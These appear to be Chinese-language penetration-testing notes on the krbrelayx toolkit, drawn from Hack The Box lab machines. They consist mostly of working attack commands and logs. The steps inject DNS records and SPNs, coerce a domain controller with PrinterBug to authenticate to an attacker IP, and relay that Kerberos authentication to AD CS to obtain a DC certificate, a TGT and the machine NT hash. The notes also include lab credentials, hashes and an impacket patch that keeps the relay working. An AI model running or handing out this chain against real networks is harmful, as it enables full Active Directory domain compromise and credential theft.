krbrelayx
GitHub - dirkjanm/krbrelayx: Kerberos relaying and unconstrained delegation abuse toolkit
KrbRelayX 是一套利用 Kerberos 协议 进行中继(Relay)的技术方案,由安全研究员@_dirkjan 开发。它解决了传统 NTLM Relay 在面对签名强制、通道绑定或自中继防护时的局限性。
相关文章: https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/
常用于 Unconstrained delegation 攻击中
git clone https://github.com/dirkjanm/krbrelayx
#添加DNS记录
dnstool.py -u 'delegate.vl\hack$' -p 'Admin123' --action add -r hack.delegate.vl -d 10.10.14.69 --type A -dns-ip 10.129.234.69
bloodyAD -u victor.r -p 'victor1gustavo@#' -d darkcorp.htb -k --host DC-01.darkcorp.htb add dnsRecord DC-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA 10.10.14.86 [--forest]
#加SPN (--additional 可能需要第二次)
addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'ldap/hack.delegate.vl' -t 'hack$' -dc-ip 10.129.234.69 dc1.delegate.vl
#强制认证
printerbug.py -hashes :e45a314c664d40a227f9540121d1a29d 'delegate.vl/hack$@dc1.delegate.vl' hack.delegate.vl
#开启监听
krbrelayx.py -hashes :e45a314c664d40a227f9540121d1a29d
相关命令
#看解析
nslookup hack.delegate.vl dc1.delegate.vl
#新建计算机
impacket-addcomputer 'delegate.vl/N.Thompson:KALEB_2341' -computer-name hack -computer-pass Admin123 -dc-ip 10.129.234.69
ESC8:
#添加带序列化SPN的DNS记录
bloodyAD -u Rosie.Powell -p Cicada123 -d cicada.vl -k --host DC-JPQ225.cicada.vl add dnsRecord "DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" 10.10.14.86
#kerberos中继监听
krbrelayx.py -t http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp --adcs --template DomainController
#触发强制认证
nxc smb DC-JPQ225.cicada.vl -k --use-kcache -M coerce_plus -o L=DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA M=PrinterBug
#获取tgt
certipy auth -pfx unknown7148\$.pfx -dc-ip 10.129.234.48
可能会报错:
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# krbrelayx.py -t http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp --adcs --template DomainController
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.129.234.48
[*] HTTP server returned status code 200, treating as a successful login
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] SMBD: Received connection from 10.129.234.48
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.129.234.48
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] GOT CERTIFICATE! ID 90
Exception in thread Thread-5:
Traceback (most recent call last):
File "/usr/lib/python3.13/threading.py", line 1041, in _bootstrap_inner
self.run()
~~~~~~~~^^
File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py", line 42, in run
ADCSAttack._run(self)
~~~~~~~~~~~~~~~^^^^^^
File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 81, in _run
certificate_store = self.generate_pfx(key, certificate)
File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 113, in generate_pfx
p12 = crypto.PKCS12()
^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/cryptography/utils.py", line 68, in __getattr__
obj = getattr(self._module, attr)
AttributeError: module 'OpenSSL.crypto' has no attribute 'PKCS12'
使用下面的命令
uv run --with "impacket>=0.11.0" --with "pyOpenSSL==24.0.0" krbrelayx.py -t 'https://dc-01.darkcorp.htb/certsrv/certfnsh.asp' --adcs -v 'WEB-01$'
或者修改Impacket的generate_pfx:
def generate_pfx(self, key, certificate):
certificate = crypto.load_certificate(crypto.FILETYPE_PEM, certificate)
p12 = crypto.PKCS12()
p12.set_certificate(certificate)
p12.set_privatekey(key)
return p12.export()
#=========改成下面的即可=================
def generate_pfx(self, key, certificate):
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.serialization import pkcs12
# 将证书从 PEM 转换为 cryptography 对象
cert_pem = certificate.encode() if isinstance(certificate, str) else certificate
cert_obj = crypto.load_certificate(crypto.FILETYPE_PEM, cert_pem)
cryptography_cert = cert_obj.to_cryptography()
# 将 OpenSSL 的私钥转换为 cryptography 对象
key_pem = crypto.dump_privatekey(crypto.FILETYPE_PEM, key)
cryptography_key = serialization.load_pem_private_key(key_pem, password=None)
# 生成 PKCS12 数据
p12_data = pkcs12.serialize_key_and_certificates(
name=b"",
key=cryptography_key,
cert=cryptography_cert,
cas=None,
encryption_algorithm=serialization.NoEncryption()
)
return p12_data
1. 案例
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# bloodyAD -u Rosie.Powell -p Cicada123 -d cicada.vl -k --host DC-JPQ225.cicada.vl add dnsRecord "DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" 10.10.14.86
[+] DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA has been successfully added
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# nxc smb DC-JPQ225.cicada.vl -k -u rosie.powell -p Cicada123 -M coerce_plus -o L=DC-JPQ2251UWhRCAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA M=PrinterBug
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [*] x64 (name:DC-JPQ225) (domain:cicada.vl) (signing:True) (SMBv1:None) (NTLM:False)
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [+] cicada.vl\rosie.powell:Cicada123
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, PrinterBug
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 Exploit Success, spoolss\RpcRemoteFindFirstPrinterChangeNotificationEx
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# krbrelayx.py -t http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp --adcs --template DomainController
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.129.234.48
[*] HTTP server returned status code 200, treating as a successful login
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] SMBD: Received connection from 10.129.234.48
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.129.234.48
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] GOT CERTIFICATE! ID 92
[*] Writing PKCS#12 certificate to ./unknown5898$.pfx
[*] Certificate successfully written to file
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# certipy auth -pfx unknown7148\$.pfx -dc-ip 10.129.234.48
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN DNS Host Name: 'DC-JPQ225.cicada.vl'
[*] Security Extension SID: 'S-1-5-21-687703393-1447795882-66098247-1000'
[*] Using principal: 'dc-jpq225$@cicada.vl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'dc-jpq225.ccache'
[*] Wrote credential cache to 'dc-jpq225.ccache'
[*] Trying to retrieve NT hash for 'dc-jpq225$'
[*] Got hash for 'dc-jpq225$@cicada.vl': aad3b435b51404eeaad3b435b51404ee:a65952c664e9cf5de60195626edbeee3